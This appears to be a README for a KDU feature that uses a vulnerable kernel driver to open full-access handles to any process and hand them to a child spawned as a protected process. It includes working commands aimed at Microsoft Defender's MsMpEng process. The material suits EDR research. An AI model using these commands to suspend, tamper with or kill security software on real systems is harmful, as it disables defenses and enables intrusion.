* new command line option `-pho` to open any process with the vuln driver with PROCESS_ALL_ACCESS rights
* the handle will be inherited to the child process, defined by the `-phc` command-line
* the child process may also be spawned as a ppl

## Example 1
spawns powershell.exe as PPL-AntiMalware and with a PROCESS_ALL_ACCESS handle to MsMpEng
```powershell
kdu.exe -pho (Get-Process MsMpEng).Id -phc powershell.exe -phe 3 -prv 39
```

## Example 2
execute [Handler.exe](https://github.com/evilele/EDR-Introspection/blob/adc70b0ee27ceb24a6b157ed2197b77749d8c84e/x64/Release/Handler.exe) as in [main.cpp](https://github.com/evilele/EDR-Introspection/blob/adc70b0ee27ceb24a6b157ed2197b77749d8c84e/misc/Handler/main.cpp), which enumerats all process handles in Handler.exe and prints the loaded modules of the referenced processes
```powershell
kdu.exe -pho (Get-Process MsMpEng).Id -phc Handler.exe -prv 39
```

# Why
* some processes may not allow PROCESS_ALL_ACCESS handles due to kernel callbacks, even if the calling process has the corresponding PPL level

## Use-Cases
* this PROCESS_ALL_ACCESS allows to inspect, modify, suspend and terminate any process, even when (certain) kernel callbacks  are enabled

# How
* a vuln driver with the OpenProcess primitive is used to open a handle to an arbitrary process
  * the inherit flag is set to true with SetHandleInformation(), when it was false
  * the access right is patched to PROCESS_ALL_ACCESS with r/w primitives in EPROCESS, when it was downgraded
* the child process might be elevated to any PPL Level with the existing PPL infrastructure (r/w in EPROCESS) 